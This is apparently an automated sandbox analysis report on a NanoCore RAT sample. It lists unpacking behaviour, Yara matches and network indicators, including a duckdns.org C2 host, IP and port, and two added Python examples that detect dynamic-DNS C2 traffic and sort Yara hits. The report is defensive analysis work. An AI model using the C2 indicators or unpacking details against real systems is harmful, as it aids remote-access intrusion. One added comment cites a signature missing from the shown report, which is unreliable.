Source: 2.2.nanocore.exe.4a90000.8.unpack, Avira label: TR/Dropper.MSIL.Gen7
Source: 13.2.dhcpmon.exe.4fa0000.9.unpack, Avira label: TR/Dropper.MSIL.Gen7
Source: 2.2.nanocore.exe.58b0000.12.unpack, Avira label: TR/NanoCore.fadte
Source: 2.1.nanocore.exe.400000.0.unpack, Avira label: TR/Dropper.MSIL.Gen7
Source: 11.1.dhcpmon.exe.400000.0.unpack, Avira label: TR/Dropper.MSIL.Gen7
Source: 11.2.dhcpmon.exe.400000.0.unpack, Avira label: TR/Dropper.MSIL.Gen7
Source: 10.1.nanocore.exe.400000.0.unpack, Avira label: TR/Dropper.MSIL.Gen7
Source: 13.1.dhcpmon.exe.400000.0.unpack, Avira label: TR/Dropper.MSIL.Gen7

Compliance:

Detected unpacking (creates a PE file in dynamic memory)
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, unpacked PE file: 11.2.dhcpmon.exe.4920000.9.unpack
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\nanocore.exe, unpacked PE file: 2.2.nanocore.exe.400000.0.unpack
Source: C:\Users\user\Desktop\nanocore.exe, unpacked PE file: 10.2.nanocore.exe.400000.0.unpack
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, unpacked PE file: 11.2.dhcpmon.exe.400000.0.unpack
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, unpacked PE file: 13.2.dhcpmon.exe.400000.1.unpack
Source: nanocore.exe, static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: binary string wntdll.pdbUGP, found in: nanocore.exe, 00000001.00000003.642186988.000000001EF10000.00000004.00000001.sdmp; nanocore.exe, 00000008.00000003.662832821.000000001EF60000.00000004.00000001.sdmp; dhcpmon.exe, 00000009.00000003.662538555.000000001EE10000.00000004.00000001.sdmp; dhcpmon.exe, 0000000C.00000003.682182243.000000001EE20000.00000004.00000001.sdmp
Source: binary string wntdll.pdb, found in: nanocore.exe, 00000001.00000003.642186988.000000001EF10000.00000004.00000001.sdmp; nanocore.exe, 00000008.00000003.662832821.000000001EF60000.00000004.00000001.sdmp; dhcpmon.exe, 00000009.00000003.662538555.000000001EE10000.00000004.00000001.sdmp; dhcpmon.exe, 0000000C.00000003.682182243.000000001EE20000.00000004.00000001.sdmp
Source: C:\Users\user\Desktop\nanocore.exe, code function 1_2_00405301: DeleteFileA, lstrcatA, lstrcatA, lstrlenA, FindFirstFileA, SetFileAttributesA, DeleteFileA, FindNextFileA, FindClose, SetFileAttributesA, RemoveDirectoryA
Source: C:\Users\user\Desktop\nanocore.exe, code function 1_2_00405C94: SetErrorMode, SetErrorMode, FindFirstFileA, SetErrorMode, FindClose
Source: C:\Users\user\Desktop\nanocore.exe, code function 1_2_004026BC: FindFirstFileA
Source: C:\Users\user\Desktop\nanocore.exe, code function 2_2_00404A29: FindFirstFileExW
Source: C:\Users\user\Desktop\nanocore.exe, code function 8_2_00405301: DeleteFileA, lstrcatA, lstrcatA, lstrlenA, FindFirstFileA, SetFileAttributesA, DeleteFileA, FindNextFileA, FindClose, SetFileAttributesA, RemoveDirectoryA
Source: C:\Users\user\Desktop\nanocore.exe, code function 8_2_00405C94: SetErrorMode, SetErrorMode, FindFirstFileA, SetErrorMode, FindClose
Source: C:\Users\user\Desktop\nanocore.exe, code function 8_2_004026BC: FindFirstFileA
Source: C:\Users\user\Desktop\nanocore.exe, code function 10_2_00404A29: FindFirstFileExW
Source: C:\Users\user\Desktop\nanocore.exe, code function 10_1_00404A29: FindFirstFileExW
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, code function 11_2_00404A29: FindFirstFileExW
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, code function 11_1_00404A29: FindFirstFileExW
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, code function 13_2_00404A29: FindFirstFileExW
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, code function 13_1_00404A29: FindFirstFileExW

      Networking:

      C2 URLs / IPs found in malware configuration
      Source: Malware configuration extractor | URLs: chinomso.duckdns.org
      Uses dynamic DNS services
      Source: unknown | DNS query: name: chinomso.duckdns.org
      Source: global traffic | TCP traffic: 192.168.2.4:49740 -> 213.208.152.210:7688
      Source: Joe Sandbox View | ASN Name: NEXTLAYER-ASAT NEXTLAYER-ASAT
      Source: unknown | DNS traffic detected: queries for: chinomso.duckdns.org
      Source: C:\Users\user\Desktop\nanocore.exe | Code function: 1_2_00404EA0 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,lstrlenA,GlobalUnlock,SetClipboardData,CloseClipboard,1_2_00404EA0
      Source: nanocore.exe, 00000001.00000002.650327824.0000000000A4A000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
      Source: nanocore.exe, 00000002.00000002.909694649.00000000058B0000.00000004.00000001.sdmp | Binary or memory string: RegisterRawInputDevices
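The two network observations above (a query for a duckdns.org host, then a TCP session to the resolved address on port 7688) are the pattern a detection engineer would key on. The following is an added example of that detection logic, not Joe Sandbox code and not part of the original report: it correlates dynamic-DNS answers with outbound connections on non-standard ports over constructed Zeek-style log lines that mirror the report's indicators. The suffix list beyond duckdns.org, the "standard" port set and the tab-separated log layout are assumptions.

```python
"""Correlate dynamic-DNS answers with outbound sessions on unusual ports.

Added example, not Joe Sandbox tooling.  Log lines are constructed to mirror
this report (chinomso.duckdns.org -> 213.208.152.210, TCP 49740 -> 7688).
"""

# Assumption: suffixes of dynamic-DNS providers; the report only shows duckdns.org.
DYNAMIC_DNS_SUFFIXES = ("duckdns.org", "no-ip.org", "ddns.net", "hopto.org")

# Assumption: destination ports considered normal for outbound client traffic.
STANDARD_PORTS = {53, 80, 123, 443, 993, 995}

# Constructed sample records (Zeek-like, tab separated):
#   dns:  ts  src  resolver  query  qtype  answer
#   conn: ts  src  sport  dst  dport  proto
DNS_LOG = [
    "1617000001.0\t192.168.2.4\t8.8.8.8\tchinomso.duckdns.org\tA\t213.208.152.210",
    "1617000002.0\t192.168.2.4\t8.8.8.8\twww.example.com\tA\t93.184.216.34",
]
CONN_LOG = [
    "1617000003.0\t192.168.2.4\t49740\t213.208.152.210\t7688\ttcp",
    "1617000004.0\t192.168.2.4\t49741\t93.184.216.34\t443\ttcp",
]


def is_dynamic_dns(name):
    """True if the query name is a dynamic-DNS provider host or subdomain."""
    name = name.lower().rstrip(".")
    return any(name == s or name.endswith("." + s) for s in DYNAMIC_DNS_SUFFIXES)


def parse_dns(lines):
    """Return {answer_ip: query_name} for answers to dynamic-DNS names only."""
    resolved = {}
    for line in lines:
        _ts, _src, _resolver, query, _qtype, answer = line.split("\t")
        if is_dynamic_dns(query):
            resolved[answer] = query
    return resolved


def find_c2_indicators(dns_lines, conn_lines):
    """Return (indicator, value, context) tuples for analyst review.

    A dynamic-DNS query alone is a weak signal; a follow-on session to the
    resolved address on a non-standard port is what raises it to C2-like.
    """
    findings = []
    dyn = parse_dns(dns_lines)
    for ip, name in dyn.items():
        findings.append(("dynamic_dns_query", name, ip))
    for line in conn_lines:
        _ts, _src, _sport, dst, dport, _proto = line.split("\t")
        if dst in dyn and int(dport) not in STANDARD_PORTS:
            findings.append(("c2_nonstandard_port", f"{dst}:{dport}", dyn[dst]))
    return findings


if __name__ == "__main__":
    for indicator, value, context in find_c2_indicators(DNS_LOG, CONN_LOG):
        print(f"{indicator:22s} {value:28s} ({context})")
```

Run as a script it prints one line per finding; in a pipeline the same functions would be fed the real dns.log and conn.log rather than the constructed lists.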

      E-Banking Fraud:

      Yara detected Nanocore RAT
      Source: Yara match | File source: 00000001.00000002.651116412.000000001EEC0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 0000000A.00000002.683529518.0000000000679000.00000004.00000020.sdmp, type: MEMORY
      Source: Yara match | File source: 00000008.00000002.669624228.000000001EEC0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 0000000A.00000001.662848703.0000000000414000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000002.00000002.904801478.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 00000002.00000002.909694649.00000000058B0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 0000000D.00000001.685346299.0000000000414000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match | File source: 0000000A.00000002.684499268.00000000034FC000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 0000000D.00000002.703714772.00000000033F1000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 0000000C.00000002.691295579.000000001ED80000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 0000000D.00000002.704559063.0000000004FA2000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 0000000B.00000002.683969306.00000000006FC000.00000004.00000020.sdmp, type: MEMORY
      Source: Yara match | File source: 0000000D.00000002.703774283.000000000342C000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 0000000A.00000002.682558622.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 00000002.00000002.907930500.0000000004A92000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 0000000B.00000002.683128059.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 0000000B.00000002.686692380.0000000004922000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 00000009.00000002.671860077.000000001ED70000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 0000000D.00000002.702826612.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 00000002.00000002.905801654.0000000002531000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 00000002.00000002.904977643.0000000000598000.00000004.00000020.sdmp, type: MEMORY
      Source: Yara match | File source: 0000000B.00000002.684652674.000000000330C000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 0000000B.00000002.686247080.00000000047F0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 0000000D.00000002.703409413.00000000006E7000.00000004.00000020.sdmp, type: MEMORY
      Source: Yara match | File source: 0000000A.00000002.685817351.0000000004940000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 0000000A.00000002.684426343.00000000034C1000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 00000002.00000001.645917465.0000000000414000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000002.00000002.907047589.0000000004970000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 0000000D.00000002.704356267.0000000004910000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 0000000B.00000001.663544913.0000000000414000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match | File source: 0000000A.00000002.686102213.00000000049C2000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 0000000B.00000002.684614120.00000000032D1000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 00000002.00000002.906581049.00000000035AC000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 0000000D.00000003.685637337.0000000000711000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: Process Memory Space: dhcpmon.exe PID: 5752, type: MEMORY
      Source: Yara match | File source: Process Memory Space: dhcpmon.exe PID: 6152, type: MEMORY
      Source: Yara match | File source: Process Memory Space: nanocore.exe PID: 7064, type: MEMORY
      Source: Yara match | File source: Process Memory Space: nanocore.exe PID: 7104, type: MEMORY
      Source: Yara match | File source: Process Memory Space: nanocore.exe PID: 4108, type: MEMORY
      Source: Yara match | File source: Process Memory Space: nanocore.exe PID: 5904, type: MEMORY
      Source: Yara match | File source: Process Memory Space: dhcpmon.exe PID: 6724, type: MEMORY
      Source: Yara match | File source: Process Memory Space: dhcpmon.exe PID: 6704, type: MEMORY
      Source: Yara match | File source: 10.1.nanocore.exe.415058.1.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 11.2.dhcpmon.exe.415058.1.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 1.2.nanocore.exe.1eed1458.5.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 10.2.nanocore.exe.696a10.2.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 11.2.dhcpmon.exe.33531ec.6.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 11.2.dhcpmon.exe.4920000.9.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 8.2.nanocore.exe.1eec0000.5.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 11.2.dhcpmon.exe.32d5530.4.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 1.2.nanocore.exe.1eec0000.4.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 13.2.dhcpmon.exe.4910000.8.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 9.2.dhcpmon.exe.1ed81458.5.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 13.2.dhcpmon.exe.400000.1.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 13.1.dhcpmon.exe.415058.1.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 13.2.dhcpmon.exe.4910000.8.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 8.2.nanocore.exe.1eec0000.5.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 13.2.dhcpmon.exe.415058.0.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 10.2.nanocore.exe.4940000.8.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 10.2.nanocore.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 11.2.dhcpmon.exe.33531ec.6.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 13.2.dhcpmon.exe.415058.0.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 13.2.dhcpmon.exe.33f5530.4.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 10.2.nanocore.exe.49c0000.9.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 10.1.nanocore.exe.415058.1.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 2.2.nanocore.exe.58b4629.13.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 10.2.nanocore.exe.400000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 2.2.nanocore.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 2.2.nanocore.exe.4a90000.8.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 13.2.dhcpmon.exe.4fa0000.9.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 13.3.dhcpmon.exe.7130f0.0.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 2.2.nanocore.exe.58b0000.12.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 2.2.nanocore.exe.4970000.7.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 10.2.nanocore.exe.34c5530.4.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 2.1.nanocore.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 11.2.dhcpmon.exe.47f0000.8.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 9.2.dhcpmon.exe.1ed70000.4.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 8.2.nanocore.exe.1eed1458.4.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 2.2.nanocore.exe.400000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 13.2.dhcpmon.exe.346e3b6.7.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 2.2.nanocore.exe.35b7815.6.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 11.2.dhcpmon.exe.400000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 10.2.nanocore.exe.34c5530.4.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 9.2.dhcpmon.exe.1ed70000.4.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 11.2.dhcpmon.exe.715c48.2.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 13.2.dhcpmon.exe.3477815.5.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 1.2.nanocore.exe.1eed1458.5.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 2.2.nanocore.exe.415058.1.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 10.2.nanocore.exe.3547815.5.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 11.2.dhcpmon.exe.3357815.5.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 11.2.dhcpmon.exe.415058.1.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 10.2.nanocore.exe.696a10.2.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 2.2.nanocore.exe.35b31ec.4.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 2.1.nanocore.exe.415058.1.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 13.2.dhcpmon.exe.33f5530.4.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 11.2.dhcpmon.exe.32d5530.4.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 2.2.nanocore.exe.5b31b8.2.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 13.3.dhcpmon.exe.7130f0.0.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 13.2.dhcpmon.exe.34731ec.6.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 13.1.dhcpmon.exe.415058.1.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 2.2.nanocore.exe.415058.1.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 10.2.nanocore.exe.4940000.8.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 13.2.dhcpmon.exe.400000.1.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 13.2.dhcpmon.exe.7130f0.2.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 2.2.nanocore.exe.4970000.7.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 10.2.nanocore.exe.35431ec.6.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 11.1.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 1.2.nanocore.exe.1eec0000.4.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 2.2.nanocore.exe.35b31ec.4.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 11.2.dhcpmon.exe.47f0000.8.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 9.2.dhcpmon.exe.1ed81458.5.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 2.2.nanocore.exe.35ae3b6.5.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 2.1.nanocore.exe.415058.1.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 10.2.nanocore.exe.415058.1.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 8.2.nanocore.exe.1eed1458.4.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 10.2.nanocore.exe.35431ec.6.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 2.2.nanocore.exe.58b0000.12.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 12.2.dhcpmon.exe.1ed91458.5.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 12.2.dhcpmon.exe.1ed80000.4.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 12.2.dhcpmon.exe.1ed80000.4.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 13.2.dhcpmon.exe.7130f0.2.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 11.2.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 10.2.nanocore.exe.415058.1.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 10.1.nanocore.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 13.1.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 10.2.nanocore.exe.353e3b6.7.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 13.2.dhcpmon.exe.34731ec.6.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 11.2.dhcpmon.exe.334e3b6.7.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 12.2.dhcpmon.exe.1ed91458.5.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 11.1.dhcpmon.exe.415058.1.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 11.2.dhcpmon.exe.715c48.2.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 11.1.dhcpmon.exe.415058.1.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 2.2.nanocore.exe.5b31b8.2.raw.unpack, type: UNPACKEDPE
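The match list above is long because the same payload is hit in every process the sample spawns (nanocore.exe and its dhcpmon.exe copies) and at several stages of each. For triage it is more useful to fold it per process and to pick out the regions that are both executable and writable, since those are where the unpacked PE lives. The following added example does that; it is not Joe Sandbox code. It assumes that a ".sdmp" name has the layout process.stage.id.base.protection.type (with protection being the Windows page-protection value, 0x40 = PAGE_EXECUTE_READWRITE, 0x04 = PAGE_READWRITE) and that an ".unpack" name has the layout process.stage.image.address.index[.raw]; the meaning of the trailing "type" field is not interpreted. The sample identifiers are copied from this report.

```python
"""Fold Joe Sandbox Yara-hit sources per process and flag RWX regions.

Added example, not Joe Sandbox code.  Name layouts are assumptions (see the
lead-in); the sample identifiers below are taken from this report.
"""
import re
from collections import defaultdict

PAGE_READWRITE = 0x04
PAGE_EXECUTE_READWRITE = 0x40

# Assumed layout: <process>.<stage>.<id>.<base>.<protection>.<type>.sdmp
SDMP_RE = re.compile(
    r"^(?P<proc>[0-9A-Fa-f]{8})\.(?P<stage>[0-9A-Fa-f]{8})\.(?P<id>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<prot>[0-9A-Fa-f]{8})\.(?P<type>[0-9A-Fa-f]{8})\.sdmp$"
)
# Assumed layout: <process>.<stage>.<image>.<address>.<index>[.raw].unpack
UNPACK_RE = re.compile(
    r"^(?P<proc>\d+)\.(?P<stage>\d+)\.(?P<image>.+?\.exe)\."
    r"(?P<addr>[0-9a-fA-F]+)\.(?P<idx>\d+)(?P<raw>\.raw)?\.unpack$"
)

# Identifiers copied from the report's "Yara detected Nanocore RAT" list.
SAMPLE_SOURCES = [
    "00000002.00000002.904801478.0000000000400000.00000040.00000001.sdmp",
    "00000002.00000002.909694649.00000000058B0000.00000004.00000001.sdmp",
    "0000000A.00000001.662848703.0000000000414000.00000040.00020000.sdmp",
    "10.1.nanocore.exe.415058.1.unpack",
    "13.2.dhcpmon.exe.4910000.8.raw.unpack",
    "Process Memory Space: dhcpmon.exe PID: 5752",  # whole-process hit, no region
]


def parse_source(src):
    """Return a dict describing the hit location, or None if not a region name."""
    m = SDMP_RE.match(src)
    if m:
        return {"kind": "sdmp", "proc": int(m["proc"], 16), "stage": int(m["stage"], 16),
                "base": int(m["base"], 16), "prot": int(m["prot"], 16), "image": None}
    m = UNPACK_RE.match(src)
    if m:
        return {"kind": "unpack", "proc": int(m["proc"]), "stage": int(m["stage"]),
                "base": int(m["addr"], 16), "prot": None, "image": m["image"]}
    return None


def summarise(sources):
    """Group hits per process index; record RWX bases and unpacked image names."""
    per_proc = defaultdict(lambda: {"hits": 0, "rwx": set(), "images": set()})
    for src in sources:
        p = parse_source(src)
        if p is None:
            continue
        entry = per_proc[p["proc"]]
        entry["hits"] += 1
        if p["image"]:
            entry["images"].add(p["image"])
        # Only the low byte carries the base protection; PAGE_GUARD etc. sit above it.
        if p["prot"] is not None and (p["prot"] & 0xFF) == PAGE_EXECUTE_READWRITE:
            entry["rwx"].add(p["base"])
    return dict(per_proc)


if __name__ == "__main__":
    for proc, info in sorted(summarise(SAMPLE_SOURCES).items()):
        rwx = ", ".join(f"0x{b:x}" for b in sorted(info["rwx"])) or "-"
        print(f"process {proc:2d}: {info['hits']} hits, RWX at {rwx}, images {sorted(info['images'])}")
```

The RWX hits at 0x400000 and 0x414000 are the ones to pull first: they sit inside the main module's image range, which is consistent with the "overwrites its own PE header" and "creates a process in suspended mode" signatures listed at the top of the report.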

      System Summary:

      Malicious sample detected (through community Yara rule)
      Source: 00000001.00000002.651116412.000000001EEC0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000001.00000002.651116412.000000001EEC0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000000A.00000002.683529518.0000000000679000.00000004.00000020.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000A.00000002.683529518.0000000000679000.00000004.00000020.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000000B.00000002.684555433.0000000002320000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000008.00000002.669624228.000000001EEC0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000008.00000002.669624228.000000001EEC0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000000A.00000001.662848703.0000000000414000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000A.00000001.662848703.0000000000414000.00000040.00020000.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000000A.00000002.684361480.0000000002510000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000002.00000002.904801478.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000002.00000002.904801478.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000002.00000002.909694649.00000000058B0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000D.00000001.685346299.0000000000414000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000D.00000001.685346299.0000000000414000.00000040.00020000.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000000A.00000002.684499268.00000000034FC000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000000D.00000002.703714772.00000000033F1000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000D.00000002.703714772.00000000033F1000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000000C.00000002.691295579.000000001ED80000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000C.00000002.691295579.000000001ED80000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000000D.00000002.704559063.0000000004FA2000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000D.00000002.704559063.0000000004FA2000.00000040.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000000B.00000002.683969306.00000000006FC000.00000004.00000020.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000B.00000002.683969306.00000000006FC000.00000004.00000020.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000000D.00000002.703774283.000000000342C000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000000A.00000002.682558622.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000A.00000002.682558622.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000002.00000002.907930500.0000000004A92000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000002.00000002.907930500.0000000004A92000.00000040.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
